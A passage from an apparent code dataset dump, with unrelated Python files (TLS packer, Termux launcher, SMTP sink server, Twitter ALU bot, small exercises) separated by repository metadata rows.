return_end_of_number(412) ➞ "412-TH"
### Notes
Check the **Resources** tab for more info on _ordinal numbers_.
"""
def return_end_of_number(num):
    """Return *num* as an ordinal string, e.g. 553 -> "553-RD", 34 -> "34-TH"."""
    digits = str(num)
    # 11, 12 and 13 are the irregular cases: they always take "-TH".
    if digits[-2:] in ("11", "12", "13"):
        suffix = "TH"
    else:
        # Every other number is classified by its final digit.
        suffix = {"1": "ST", "2": "ND", "3": "RD"}.get(digits[-1], "TH")
    return digits + "-" + suffix
| true |
d83d6469065af70ed1dbdf403ef7fcdd61d3e5f5 | Python | monique-tukaj/curso-em-video-py | /Exercises/ex057.py | UTF-8 | 430 | 4.03125 | 4 | [
"MIT"
] | permissive | '''Faça um programa que leia o sexo de uma pessoa, mas só aceite
os valores "M" ou "F". Caso este esteja errado, peça a digitação
novamente até ter um valor correto.'''
# Keep prompting until the user enters a valid gender code ('M' or 'F').
# BUG FIX: the original seeded r with `'M' and 'F'` (which is just 'F'),
# looped WHILE the value was valid instead of until it was valid, and used
# `r != 'M' or r != 'F'` (always true) so even a correct entry printed the
# "not found" message and re-prompted forever.
r = ''
while r != 'M' and r != 'F':
    r = str(input('Type your gender? [F/M]')).upper().strip()
    if r != 'M' and r != 'F':
        print('Try one time, please. Gender not found')
    else:
        print(f'Gender {r} selected.')
print('Fim')
ba787fbae6d7751767dbc3242efb419ec3a16c7d | Python | k23040198/270201041 | /lab2/example2.py | UTF-8 | 89 | 3.09375 | 3 | [] | no_license | x=1
y=4
z=0.25
# Evaluates ((2x + y)^2 * sqrt(z)) / (sqrt(x) + sqrt(y)) = (36 * 0.5) / 3 = 6.0
result=((((2*x)+y)**2)*(z**(1/2)))/(((x**(1/2))+(y**(1/2))))
print(result)
fd0e9a60037537c035151a5929b3b3f1addd4c10 | Python | p4k03n4t0r/protocols-in-python | /https-client/tls_message_packer.py | UTF-8 | 10,885 | 2.625 | 3 | [] | no_license | from crypto_helper import Crypto_Helper
# This class offers helper methods to pack an instance of a TLS_Message into bytes
class TLS_Message_Packer:
    """Helper methods to pack a TLS_Message instance into raw wire bytes.

    All methods are static; they read fields off the passed message/handshake
    object and serialise them per RFC 8446 (TLS 1.3).
    """

    @staticmethod
    def pack_tls_message(
        tls_message, client_handshake_key, client_handshake_iv, counter
    ):
        """Pack a complete TLS record (record header + payload).

        Returns a tuple (packed, packed_transcript): the bytes to put on the
        wire and the plaintext form kept for the handshake transcript hash.
        """
        # change_cipher_spec (x14/20)
        if tls_message.message_type == b"\x14":
            # this message type always has a body with 0x01
            message = b"\x01"
            # BUG FIX: transcript_message was only assigned in the handshake
            # branch, so this path crashed with NameError further down.
            transcript_message = message
        # alert (x15/19)
        elif tls_message.message_type == b"\x15":
            raise Exception("Packing alert is not yet supported")
        # handshake (x16/22) or application_data (x17/23)
        elif tls_message.message_type == b"\x16" or tls_message.message_type == b"\x17":
            # we pack the request backwards, because we have to know the length of the other parts
            handshake_content = TLS_Message_Packer.pack_handshake_content(tls_message)
            # use the length of the client_hello_header in the handshake_header
            handshake_header = TLS_Message_Packer.pack_handshake_header(
                tls_message, len(handshake_content)
            )
            # prepend the handshake_header before the client_hello_header
            message = handshake_header + handshake_content
            # we keep this message because we need this one for the transcript
            transcript_message = message
            # application_data (x17/23)
            if tls_message.message_type == b"\x17":
                # additional data is a combination of the record fields of this package
                # see https://tools.ietf.org/html/rfc8446#section-5.2 (the || mean concating not a logical OR operation)
                # BUG FIX: int.to_bytes(len(message)) passed the length as
                # "self" and omitted the mandatory size/byteorder arguments;
                # the length field of the additional data is a 2-byte integer.
                additional_data = (
                    tls_message.message_type
                    + tls_message.message_version
                    + len(message).to_bytes(2, tls_message.ENDINESS)
                )
                # for application data we still have to encrypt the message
                message = Crypto_Helper.aead_encrypt(
                    message,
                    additional_data,
                    client_handshake_key,
                    client_handshake_iv,
                    counter,
                )
                raise Exception("Not implemented yet")
        # use the combined length of the handshake_header and client_hello_header in the record_header
        # prepend the record_header before the message
        packed = (
            TLS_Message_Packer.pack_record_header(tls_message, len(message)) + message
        )
        packed_transcript = (
            TLS_Message_Packer.pack_record_header(tls_message, len(transcript_message))
            + transcript_message
        )
        return packed, packed_transcript

    @staticmethod
    def pack_record_header(tls_message, message_length):
        """Pack the 5-byte record header: type, legacy version, payload length."""
        record_header = tls_message.message_type
        record_header += tls_message.message_version
        # size of handshake message that follows (2-byte integer)
        record_header += message_length.to_bytes(2, tls_message.ENDINESS)
        return record_header

    @staticmethod
    def pack_handshake_header(handshake, handshake_content_length):
        """Pack the 4-byte handshake header: type plus 3-byte body length."""
        handshake_header = handshake.handshake_type
        # size of content of the handshake message that will follow (3-byte integer)
        handshake_header += handshake_content_length.to_bytes(3, handshake.ENDINESS)
        return handshake_header

    @staticmethod
    def pack_handshake_content(tls_message):
        """Dispatch on the handshake type and pack the handshake body."""
        # see https://tools.ietf.org/html/rfc8446#section-4
        # client_hello (x01/01)
        if tls_message.handshake_type == b"\x01":
            return TLS_Message_Packer.pack_client_hello(tls_message)
        # finished (x14/20)
        elif tls_message.handshake_type == b"\x14":
            return TLS_Message_Packer.pack_verify(tls_message)
        else:
            raise Exception(
                "Handshake type can't be packed yet: {}".format(
                    tls_message.handshake_type
                )
            )

    @staticmethod
    def pack_client_hello(handshake):
        """Pack a ClientHello body: version, random, session, ciphers, extensions."""
        # see https://tools.ietf.org/html/rfc8446#section-4.1.2
        # Client Version
        client_hello_packed = handshake.handshake_version
        # Client Random: 32 bytes of random data
        client_hello_packed += handshake.client_random
        # Session ID: In TLS 1.3 the session is done using PSK (pre-shared keys) mechanism, so this field is no longer needed for that purpose.
        # Instead a non-empty value in this field is used to trigger "middlebox compatibility mode" which helps TLS 1.3 sessions to be disguised as resumed TLS 1.2 sessions.
        if handshake.session is None:
            session_length = 32
            handshake.session = handshake.get_random_number(session_length).to_bytes(
                session_length, handshake.ENDINESS
            )
        # length of the session ID
        client_hello_packed += len(handshake.session).to_bytes(1, handshake.ENDINESS)
        # random session ID
        client_hello_packed += handshake.session
        # Cipher Suites: The client provides an ordered list of which cipher suites it will support for encryption.
        # The list is in the order preferred by the client, with highest preference first.
        cipher_bytes = b"".join(handshake.ciphers)
        # length of the ciphers in bytes
        client_hello_packed += len(cipher_bytes).to_bytes(2, handshake.ENDINESS)
        client_hello_packed += cipher_bytes
        # Compression Methods: TLS 1.3 no longer allows compression, so this field is always a single entry with the "null" compression method which performs no change to the data.
        # length of compression methods in bytes
        client_hello_packed += b"\x01"
        # 0x00 indicates "null" compression
        client_hello_packed += b"\x00"
        # Extensions: optional extensions the client can provide
        extensions_header = TLS_Message_Packer.pack_extensions_header(handshake)
        # length of the extensions header
        client_hello_packed += len(extensions_header).to_bytes(2, handshake.ENDINESS)
        client_hello_packed += extensions_header
        return client_hello_packed

    @staticmethod
    def pack_verify(handshake):
        """Pack a Finished body: just the client verify_data bytes."""
        # see https://tools.ietf.org/html/rfc8446#section-4.4.4
        return handshake.client_verify_data

    @staticmethod
    def pack_extensions_header(handshake):
        """Pack the ClientHello extensions block from the handshake's fields."""
        # for all extensions see https://tools.ietf.org/html/rfc8446#section-4.2
        # append extensions when provided
        # the first two bytes indicate the type of extension
        extensions_header = b""
        # Extension - Server Name (0x00 0x00): The client has provided the name of the server it is contacting, also known as SNI (Server Name Indication).
        # Without this extension a HTTPS server would not be able to provide service for multiple hostnames (virtual hosts) on a single IP address because it couldn't know which hostname's certificate to send until after the TLS session was negotiated and the HTTP request was made.
        # 0x00 indicates the type, which is "DNS Hostname" in this case
        if handshake.server_name is not None:
            extensions_header += TLS_Message_Packer.pack_extension(
                handshake,
                b"\x00\x00",
                [{b"\x00": handshake.server_name.encode("ascii")}],
            )
        # Extension - Supported Groups (0x00 0x0a): The client has indicated that it supports elliptic curve (EC) cryptography for three curve types. To make this extension more generic for other cryptography types it now calls these "supported groups" instead of "supported curves".
        # This list is presented in descending order of the client's preference.
        extensions_header += TLS_Message_Packer.pack_extension(
            handshake, b"\x00\x0a", handshake.supported_groups
        )
        # Extension - Signature Algorithms (0x00 0x0d): This extension indicates which signature algorithms the client supports. This can influence the certificate that the server presents to the client, as well as the signature that is sent by the server in the CertificateVerify record.
        # This list is presented in descending order of the client's preference.
        extensions_header += TLS_Message_Packer.pack_extension(
            handshake, b"\x00\x0d", handshake.signature_algorithms
        )
        # Extension - Key Share (0x00 0x33): The client sends one or more public keys using an algorithm that it thinks the server will support. This allows the rest of the handshake after the ClientHello and ServerHello messages to be encrypted, unlike previous protocol versions where the handshake was sent in the clear.
        extensions_header += TLS_Message_Packer.pack_extension(
            handshake, b"\x00\x33", handshake.public_keys
        )
        # Extension - Supported Versions (0x00 0x2b): supported TLS versions, the length indicating each version entry is 1 byte (because fuck logic)
        extensions_header += TLS_Message_Packer.pack_extension(
            handshake, b"\x00\x2b", handshake.supported_versions, 1
        )
        return extensions_header

    @staticmethod
    def pack_extension(
        handshake, extension_code, extension_values, list_entry_bytes_length=2
    ):
        """Generic TLV packer for one extension.

        extension_values is a list of byte strings, or of single-entry dicts
        {key_bytes: value_bytes} for typed entries (e.g. SNI hostnames).
        Returns b"" when the value list is empty.
        """
        if len(extension_values) == 0:
            return b""
        extension_bytes = b""
        for extension_value in extension_values:
            # if this extension value is made up of two values, we have to add them both
            if isinstance(extension_value, dict):
                # retrieve the key and value form the dictionary
                key = list(extension_value.keys())[0]
                value = extension_value[key]
                extension_value_bytes = value
                # prepend the value with the length of the value in bytes
                extension_value_bytes = (
                    len(extension_value_bytes).to_bytes(2, handshake.ENDINESS)
                    + extension_value_bytes
                )
                # prepend with the key
                extension_value_bytes = key + extension_value_bytes
                # append the bytes
                extension_bytes += extension_value_bytes
            # if this extension value is a single value, just append it
            else:
                extension_bytes += extension_value
        # prepend length of this list entry
        extension_bytes = (
            len(extension_bytes).to_bytes(list_entry_bytes_length, handshake.ENDINESS)
            + extension_bytes
        )
        # prepend length of all the list entries (in this case that's only one)
        extension_bytes = (
            len(extension_bytes).to_bytes(2, handshake.ENDINESS) + extension_bytes
        )
        # prepend the byte code indicating the type of extension
        extension_bytes = extension_code + extension_bytes
        return extension_bytes
| true |
44963dadf39ac1d4e2636655616dc48d6dd71d78 | Python | cprakashagr/PythonClass | /src/threads/simpleThread.py | UTF-8 | 794 | 3.265625 | 3 | [
"MIT"
] | permissive | import threading
import logging
import time
# logging.basicConfig(level=logging.DEBUG, format='[%(levelname)s] (%(threadName)-10s) %(message)s')
def threadFunction(c=1):
    """Worker body: log entry/exit and print the current thread's name plus *c*."""
    # BUG FIX: logging takes the format string first; the original passed the
    # value first (logging.debug(c, 'Starting')), which would fail to format.
    logging.debug('%s: Starting', c)
    # current_thread() replaces the camelCase alias removed in Python 3.12.
    print('Thread::::::::::', threading.current_thread().name, end='')
    print(c)
    logging.debug('%s: Exiting', c)


def main():
    """Spawn three named worker threads, then print 0..4999 on the main thread."""
    threadNameDict = {0: 'A', 1: 'B', 2: 'C'}
    threads = []
    for i in range(3):
        # BUG FIX: the original used target=threadFunction(i), which CALLS the
        # worker immediately on the main thread and hands Thread a None target.
        # Pass the callable and its arguments separately instead.
        t = threading.Thread(name=threadNameDict[i], target=threadFunction, args=(i,))
        # Mirrors the original setName(i): the numeric name overrides the letter.
        t.name = str(i)
        threads.append(t)
        threads[i].start()
    for i in range(5000):
        print(i, end='')
# Run the demo only when the file is executed directly (not on import).
if __name__ == '__main__':
    main()
| true |
d362cc25ed807d39ecd7ee5039964de9bbc0d8b0 | Python | wesleymerrick/Data-Sci-Class | /DatSciInClassStuff/Jan27.py | UTF-8 | 511 | 3.625 | 4 | [] | no_license | from __future__ import print_function
from collections import defaultdict as dd
"""
Exercises and notes from 1/27/17
"""
# Tuples - immutable lists - parentheses rather than braces
x = (1, 2, 3, 4)
# can only concatenate tuples and with tuples
# Dictionaries - stored as key-value pairs
grades = {'Joel': 80, 'Tim': 95}
print(grades['Tim'])
# EXERCISE Generate frequency count of words in a text file
word_counts = dd(int)
document = ['Alan', 'Joe', 'Alan', 'Dave', 'Goober', 'Goober', 'Goober']
word_counts
| true |
693aedfda9ed526125875419b110e627b67e112d | Python | TwitALU/Twitalu | /twitalu.py | UTF-8 | 3,094 | 3 | 3 | [] | no_license | #!/usr/bin/env python3
# 'tweet_queue' when returned will contain only the valid tweets .'work' when
# returned contains the validated commands from the scrubber. It is directly
# related to 'tweet_queue' so tweet_queue[0] and work[0] relate to the same job
# this must be maintained for the responder to work properly. work[i] has 5 parts
# work[i][0] = {the valid string as matched by the reg ex}
# work[i][1] = {the valid A part}
# work[i][2] = {the valid operation part}
# work[i][3] = {the valid B part}
# work[i][4] = {is empty but will have xxxxx placed here to indicate the solution as a string}
# work[i][5] = {is empty but will have xxxxx placed here to indicate the solution as an int}
#
import twy_twitter as twitter
import twitalu_globals as globals
import twitalu_init as init
import twitalu_OPCODE_display as OPCODE_display
import nixie
import time
# Select the math backend at start-up: the _dev module stubs out the ALU
# hardware, so only the nixie display is initialised in that mode; with real
# hardware the full init sequence runs instead.
if globals.no_hardware == True:
    import twitalu_Math_dev as tMath
    nixie.init()
else:
    import twitalu_Math as tMath
    init.init()
# Main service loop: poll Twitter for work, drive the displays, compute each
# job on the ALU backend, and tweet the results back. Runs forever.
while(1):
    nixie.tumble_display()
    OPCODE_display.display_twit_check()
    time.sleep(4)
    tweets = twitter.get_tweets()
    # input_scrub returns parallel structures: tweet_queue[i] and work[i]
    # describe the same job, and that pairing must be preserved.
    [tweet_queue, work] = twitter.input_scrub(tweets)
    try:
        print()
        work_keys = list(work.keys())
        print("Current work queue keys: {0}".format(work_keys))
        final_key = work_keys[(len(work)) - 1]
    # NOTE(review): bare except; an empty queue raises IndexError here, but
    # any other error is silently mapped to final_key = 0 as well.
    except:
        final_key = 0
    print("Final Key: {0}".format(final_key))
    print()
    print("***Processing Work***")
    if len(work) > 0:
        for i in range(0, int(final_key) + 1):
            print("|_ Job number: {0}".format(i))
            OPCODE_display.display_twitalu()
            nixie.tumble_display()
            time.sleep(2)
            try:
                print("|__ Raw work: {0}".format(work[i]["0"]))
                # Show operand A on nixie tube bank 1.
                nixie.write_value(int(work[i]["1"]), 1)
                time.sleep(2)
                # Decode operation and display on LED matrix
                if work[i]["2"] == "+":
                    OPCODE_display.display_ADD()
                elif work[i]["2"] == "-":
                    OPCODE_display.display_SUB()
                elif work[i]["2"] == "*":
                    OPCODE_display.display_MUL()
                elif work[i]["2"] == "/":
                    OPCODE_display.display_DIV()
                elif work[i]["2"] == "AND":
                    OPCODE_display.display_AND()
                elif work[i]["2"] == "OR":
                    OPCODE_display.display_OR()
                elif work[i]["2"] == "XOR":
                    OPCODE_display.display_XOR()
                elif work[i]["2"] == "ROR":
                    OPCODE_display.display_ROR()
                elif work[i]["2"] == "ROL":
                    OPCODE_display.display_ROL()
                time.sleep(2)
                # Show operand B on nixie tube bank 2.
                nixie.write_value(int(work[i]["3"]), 2)
                time.sleep(2)
                print("|___ Action: Perform calculation")
                result = tMath.calculate(work[i]["1"],work[i]["2"],work[i]["3"])
                print("|____ Result: {0}".format(result))
                print("|_____ Action: Format for insertion")
                result_str = "{0}".format(result)
                print("|______Result: {0}".format(result_str))
                # Slots "4"/"5" carry the solution back to the responder as
                # a string and as a number respectively.
                work[i]["4"] = result_str
                work[i]["5"] = result
                # Show the result on nixie tube bank 3.
                nixie.write_value(int(work[i]["5"]), 3)
                time.sleep(5)
            # NOTE(review): bare except -- any job that raises (missing keys,
            # bad operands, hardware errors) is treated as scrubbed.
            except:
                print("|__ Job empty.")
                print("|___ Conclusion: Job scrubbed")
    else:
        print("|_ Job queue empty.")
        print("|__ Conclusion: No work")
    twitter.send_response(tweet_queue, work, final_key)
724ef11b66629217731584e65932c427b6a5328c | Python | isman7/turmyx | /turmyx.py | UTF-8 | 9,187 | 2.734375 | 3 | [] | no_license | import os
import shutil
import click
import subprocess
from configparser import ConfigParser, ExtendedInterpolation
from urllib.parse import urlparse
class TurmyxConfig(ConfigParser):
    """ConfigParser specialised for turmyx.

    Loads configuration.ini from the directory containing this script and
    maps files/URLs to the 'editor:*' / 'opener:*' section that handles them.
    """
    # Directory containing this script; the config file lives beside it.
    DIR_PATH = os.path.dirname(os.path.realpath(__file__))

    def __init__(self):
        self.config_path = os.path.join(self.DIR_PATH, "configuration.ini")
        super(TurmyxConfig, self).__init__(interpolation=ExtendedInterpolation())
        self.read(self.config_path)

    def guess_file_command(self, file):
        """Return the 'editor:*' section whose extension list matches *file*,
        falling back to 'editor:default'."""
        assert isinstance(file, str)
        assert isinstance(self, ConfigParser)

        file_name = os.path.basename(file)
        # Everything after the last dot; a dotless name yields the whole name.
        extension = file_name.split('.')[-1]

        for section in self.sections():
            if "default" not in section and "editor" in section:
                if extension in self[section]["extensions"].split(" "):
                    return section

        return "editor:default"

    def guess_url_command(self, url):
        """Return the 'opener:*' section whose domain list matches *url*,
        falling back to 'opener:default'."""
        assert isinstance(url, str)
        assert isinstance(self, ConfigParser)

        url_parsed = urlparse(url)
        domain = url_parsed.netloc

        if not domain:
            print("Failed to parse URL. Attempt default opener.")
            return "opener:default"

        for section in self.sections():
            if "default" not in section and "opener" in section:
                # NOTE(review): looks like leftover debug output -- confirm.
                print(section)
                if domain in self[section]["domains"].split(" "):
                    return section

        return "opener:default"
# Decorator that injects the shared TurmyxConfig instance into click commands.
turmyx_config_context = click.make_pass_decorator(TurmyxConfig, ensure=True)
@click.group(invoke_without_command=True)
@turmyx_config_context
def cli(config_ctx):
    """
    This is turmyx! A script launcher for external files/url in Termux. Enjoy!
    """
    # The group body is intentionally empty: the subcommands do the real work.
    # config_ctx.read(config_ctx.config_path)
    # click.echo(click.get_current_context().get_help())
    pass
@cli.command()
@click.option('--merge',
              'mode',
              flag_value='merge',
              help="Merge new file config into the existing file.")
@click.option('--symlink',
              'mode',
              flag_value='symlink',
              help="Symlink to the provided configuration file.")
@click.option('--view',
              is_flag=True,
              help="Output the actual configuration of Turmyx scripts.")
@click.argument('file',
                type=click.Path(exists=True),
                required=False,
                )
@turmyx_config_context
def config(config_ctx, file, mode, view):
    """
    Set configuration file.
    You can use a mode flag to configure how to save the new configuration. Both can't be combined, so the last one
    to be called will be the used by the config command.
    """
    if file:
        # NOTE(review): the current config is deleted before the new one is
        # validated or written -- a failure below loses the old config.
        os.remove(config_ctx.config_path)
        abs_path = os.path.abspath(file)
        click.echo("Absolute path for provided file: {}".format(abs_path))
        new_config = TurmyxConfig()
        new_config.read(abs_path)
        # TODO: validate this config file.
        if not mode:
            # Default: replace the stored configuration with the new file.
            with open(config_ctx.config_path, "w") as config_f:
                new_config.write(config_f)
                click.echo("Succesfully saved into {}.".format(config_ctx.config_path))
        elif mode == "merge":
            # First attempt, only overriding partials:
            config_ctx.read(abs_path)
            with open(config_ctx.config_path, "w") as config_f:
                config_ctx.write(config_f)
            click.echo("Succesfully merged: {} \n into: {} \n and saved.".format(abs_path, config_ctx.config_path))
        elif mode == "symlink":
            os.symlink(abs_path, config_ctx.config_path)
            click.echo("Succesfully linked: {} \n to: {}.".format(config_ctx.config_path, abs_path))
    if view:
        with open(config_ctx.config_path, 'r') as config_f:
            click.echo(config_f.read())
@cli.command()
@click.argument('file',
                type=click.Path(exists=True),
                required=False,
                )
@turmyx_config_context
def editor(config_ctx, file):
    """
    Run suitable editor for any file in Termux.
    You can soft-link this command with:
    ln -s ~/bin/termux-file-editor $PREFIX/bin/turmyx-file-editor
    """
    if isinstance(file, str):
        section = config_ctx.guess_file_command(file)
        command = config_ctx[section]["command"]
        try:
            # BUG FIX: look the optional arguments up in the section's mapping;
            # the original tested the *section name* string for the substring
            # "command_args", which can never be true.
            if "command_args" in config_ctx[section]:
                arguments = config_ctx[section]["command_args"]
                call_args = [command] + arguments.split(" ") + [file]
            else:
                call_args = [command, file]
            click.echo(" ".join(call_args))
            subprocess.check_call(call_args)
        except FileNotFoundError:
            click.echo("'{}' not found. Please check the any typo or installation.".format(command))
@cli.command()
@click.argument('url',
                type=str,
                required=False,
                )
@turmyx_config_context
def opener(config_ctx, url):
    """
    Run suitable parser for any url in Termux.
    You can soft-link this command with:
    ln -s ~/bin/termux-url-opener $PREFIX/bin/turmyx-url-opener
    """
    if isinstance(url, str):
        section = config_ctx.guess_url_command(url)
        command = config_ctx[section]["command"]
        try:
            # BUG FIX: look the optional arguments up in the section's mapping;
            # the original tested the *section name* string for the substring
            # "command_args", which can never be true.
            if "command_args" in config_ctx[section]:
                arguments = config_ctx[section]["command_args"]
                call_args = [command] + arguments.split(" ") + [url]
            else:
                call_args = [command, url]
            click.echo(" ".join(call_args))
            subprocess.check_call(call_args)
        except FileNotFoundError:
            click.echo("'{}' not found. Please check the any typo or installation.".format(command))
@cli.command()
@click.argument('mode',
                type=str,
                nargs=1,
                )
@click.option('--name',
              type=str,
              nargs=1,
              help='A name for the script configuration, otherwise it will be guessed from script path.'
              )
@click.option('--default',
              is_flag=True,
              help='The script will be saved as default one for the given mode, --name option and any argument in '
                   'CASES_LIST would be ignored.'
              )
@click.argument('script',
                type=str,
                required=True)
@click.argument('cases_list',
                type=str,
                nargs=-1,
                required=False,
                )
@turmyx_config_context
def add(config_ctx, script, mode, cases_list, name, default):
    """
    Add a new script configuration.

    Examples:

        turmyx add editor nano txt md ini

        turmyx add --name radare editor r2 exe

        turmyx add opener youtube-dl youtube.com youtu.be

        turmyx add --default opener qr

    Adds a new script to Turmyx, the configuration is setted inline by an OPTION --name, otherwhise the name is
    guessed from script name. The argument MODE has to be 'editor' or 'opener' and sets the run environment of the
    script. SCRIPT must be a valid path to the script/program, and must be executable, otherwise when executing it
    would lead to an exception. Finally, the CASES_LIST will contain a list of extensions or domains to be used along with the script.

    """
    if mode not in ("opener", "editor"):
        click.echo("{} is not 'opener' or 'editor' mode.".format(mode))
        return
    click.echo("Evaluating script: {}".format(script))
    # which() both resolves the script on PATH and confirms it is executable.
    script_path = shutil.which(script)
    if script_path:
        script_path = os.path.abspath(script_path)
        click.echo("Absolute path found for script: {}".format(script_path))
    else:
        click.echo("Given script not found or not executable.")
        return
    basename = os.path.basename(script_path)
    # Section name: "<mode>:<name-or-basename>", or "<mode>:default" with --default.
    if not default:
        section = "{}:{}".format(mode, name if name else basename)
    else:
        section = "{}:default".format(mode)
    config_ctx[section] = {}
    args_command = [section, "command", script_path]
    config_ctx.set(*args_command)
    # The default section handles everything, so it carries no case list.
    if cases_list and not default:
        args_cases = [section, "extensions" if mode == "editor" else "domains", ' '.join(cases_list)]
        config_ctx.set(*args_cases)
    with open(config_ctx.config_path, "w") as config_f:
        config_ctx.write(config_f)
@cli.command()
@click.argument('script',
                type=str,
                required=True)
@turmyx_config_context
def remove(config_ctx, script):
    """
    Removes script configuration.
    """
    # remove_section() returns True only when the exact section name existed.
    if config_ctx.remove_section(script):
        click.echo("Script configuration successfully removed!")
        with open(config_ctx.config_path, 'w') as config_f:
            config_ctx.write(config_f)
    else:
        click.echo("Configuration not found.")
        # Offer close matches: any section whose name contains the argument.
        section_guesses = []
        for section in config_ctx.sections():
            if script in section:
                section_guesses.append(section)
        if section_guesses:
            click.echo("Maybe you want to say:\n{}".format(
                "\n".join(section_guesses)
            ))
| true |
cb45c63c336d5544c893c166569de62ed055663f | Python | mkirsch42/SeniorDesign_WeaponDetection | /src/objdet/handlers/logger.py | UTF-8 | 1,162 | 2.546875 | 3 | [] | no_license | from abc import abstractmethod
import cv2
from ..detection.results import BoundingBox, DetectionResult
from .detection_handler import DetectionHandler
import json
from pathlib import Path
class Logger(DetectionHandler):
    """Abstract detection handler that also exposes its stored detections
    as a sized, iterable collection."""
    @abstractmethod
    def __iter__(self):
        pass

    @abstractmethod
    def __len__(self):
        pass
class FilesystemLogger(Logger):
    """Logger backed by a directory of images plus a JSON index file.

    The index (default '_log.json') stores one entry per detection, holding
    the image filename and its bounding boxes.
    """
    def __init__(self, base_dir, log_file='_log.json'):
        self._path = Path(base_dir)
        self._path.mkdir(exist_ok=True)
        self._logfile = self._path / log_file
        try:
            with self._logfile.open() as f:
                self._json = json.load(f)
        except FileNotFoundError:
            # First run: start with an empty detection index.
            self._json = {'detections':[]}

    def __iter__(self):
        # Lazily reconstruct DetectionResult objects from the JSON entries.
        return iter(self.parse_detection(obj) for obj in self._json['detections'])

    def __len__(self):
        return len(self._json['detections'])

    def parse_detection(self, obj):
        """Rebuild a DetectionResult from one index entry (reads the image file)."""
        image = cv2.imread(str(self._path / obj['image']))
        bboxes = [BoundingBox(**bbox) for bbox in obj['bboxes']]
        return DetectionResult(image, bboxes)

    async def on_detect(self, result):
        # NOTE(review): persistence is not implemented -- detections are never
        # written to the index. Confirm whether this stub is intentional.
        pass
3930e3e0a25fe04f589711ab1616bf0edc81792c | Python | amadu80/blackhole | /blackhole/connection.py | UTF-8 | 4,471 | 2.59375 | 3 | [
"BSD-3-Clause"
] | permissive | import errno
import socket
import ssl
import sys
from tornado import iostream
from tornado.options import options
from blackhole.state import MailState
from blackhole.data import response
from blackhole.opts import ports
from blackhole.ssl_utils import sslkwargs
from blackhole.log import log
def sockets():
    """
    Spawn a looper which loops over socket data and creates
    the sockets.

    It should only ever loop over a maximum of two - standard (std)
    and SSL (ssl).

    This way we're able to detect incoming connection vectors and
    handle them accordingly.

    A dictionary of sockets is then returned to later be added to
    the IOLoop.
    """
    socks = {}
    for s in ports():
        try:
            port = options.ssl_port if s == "ssl" else options.port
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
            sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            # Non-blocking listener with a deep accept backlog.
            sock.setblocking(0)
            sock.bind((options.host, port))
            sock.listen(5000)
            socks[s] = sock
        except socket.error, e:
            # errno 13 == EACCES: e.g. binding a privileged port without rights.
            if e.errno == 13:
                log.error("Permission denied, could not bind to %s:%s" %
                          (options.host, port))
            else:
                log.error(e)
            sys.exit(1)
    return socks
def connection_stream(connection):
"""
Detect which socket the connection is being made on,
create and iostream for the connection, wrapping it
in SSL if connected over the SSL socket.
"""
if connection.getsockname()[1] == options.ssl_port and options.ssl:
try:
ssl_connection = ssl.wrap_socket(connection, **sslkwargs)
except (ssl.SSLError, socket.error), e:
if e.errno == ssl.SSL_ERROR_EOF or e.errno == errno.ECONNABORTED:
ssl_connection.close()
return
else:
raise
# Do a nasty blanket Exception until SSL exceptions are fully known
try:
return iostream.SSLIOStream(ssl_connection)
except Exception, e:
log.error(e)
ssl_connection.close()
return
else:
return iostream.IOStream(connection)
def handle_command(line, stream, mail_state):
    """Handle each SMTP command as it's sent to the server.

    While mail_state.reading is set we are inside a DATA body and only look
    for the terminating "." line; otherwise the line is matched against the
    SMTP verbs and the canned response code is written back to the stream.
    """
    if mail_state.reading:
        resp = None
        # Not exactly nice but it's only way I could safely figure
        # out if it was the \n.\n
        if line[0] == "." and len(line) == 3 and ord(line[0]) == 46:
            mail_state.reading = False
            resp = response()
    elif any(line.lower().startswith(e) for e in ['helo', 'ehlo',
                                                  'mail from',
                                                  'rcpt to', 'rset']):
        resp = response(250)
    elif line.lower().startswith("starttls"):
        resp = response(220)
    elif line.lower().startswith("vrfy"):
        resp = response(252)
    elif line.lower().startswith("quit"):
        # QUIT closes the stream immediately after the 221 goodbye.
        resp = response(221)
        stream.write(resp)
        stream.close()
        return
    elif line.lower().startswith("data"):
        resp = response(354)
        mail_state.reading = True
    else:
        # Anything unrecognised gets a 500 syntax error.
        resp = response(500)
    if resp:
        stream.write(resp)
def connection_ready(sock, fd, events):
    """
    Accepts the socket connections and passes them off
    to be handled.
    """
    while True:
        try:
            connection, address = sock.accept()
        except socket.error, e:
            # A non-blocking accept with nothing pending raises EWOULDBLOCK /
            # EAGAIN: that simply means we have drained the queue.
            if e.errno not in (errno.EWOULDBLOCK, errno.EAGAIN):
                raise
            return
        connection.setblocking(0)
        stream = connection_stream(connection)
        # connection_stream() returns None for aborted SSL handshakes.
        if not stream:
            return
        mail_state = MailState()
        # Sadly there is nothing I can do about the handle and loop
        # fuctions. They have to exist within connection_ready
        def handle(line):
            """
            Handle a line of socket data, figure out if
            it's a valid SMTP keyword and handle it
            accordingly.
            """
            handle_command(line, stream, mail_state)
            loop()

        def loop():
            """
            Loop over the socket data until we receive
            a newline character (\n)
            """
            stream.read_until("\n", handle)

        # Greet the client with the 220 banner, then start the read loop.
        stream.write(response(220))
        loop()
| true |
c88e2f78a7c115172112df48043eb7a87ddb464f | Python | stemkoski/BAGEL-Python | /BAGEL-Python/src/Texture.py | UTF-8 | 589 | 2.984375 | 3 | [] | no_license | import pygame
from Rectangle import *
class Texture(object):
    """Wraps a pygame surface together with its pixel dimensions."""

    def __init__(self):
        # Surface is attached later by load(); dimensions default to zero.
        self.image = None
        self.width = 0
        self.height = 0

    @staticmethod
    def load(filename):
        """Create a Texture backed by the image file at *filename*."""
        loaded = Texture()
        loaded.image = pygame.image.load(filename)
        loaded.width = loaded.image.get_width()
        loaded.height = loaded.image.get_height()
        return loaded

    def clone(self):
        """Return a new Texture sharing this one's surface and dimensions."""
        copy = Texture()
        copy.image, copy.width, copy.height = self.image, self.width, self.height
        return copy
| true |
4ec8d3c9da91b54215d4fd1507c037a627ffb15f | Python | berkott/mClasses | /class4.py | UTF-8 | 398 | 4.75 | 5 | [] | no_license | # Indexing: 0 to length -1
# 0123456789
# 0 -1
x = "I like pie"
# Loop through a string with a while loop
i = 0
while i < len(x):
print(x[i])
i += 1
# Regular for loop can access the index values
for i in range(len(x)):
print(i)
print(x[i])
print("=======")
# For each loop only has the elements
for char in x:
print(char)
print(x[2:7:2])
print(len(x[1:4]))
| true |
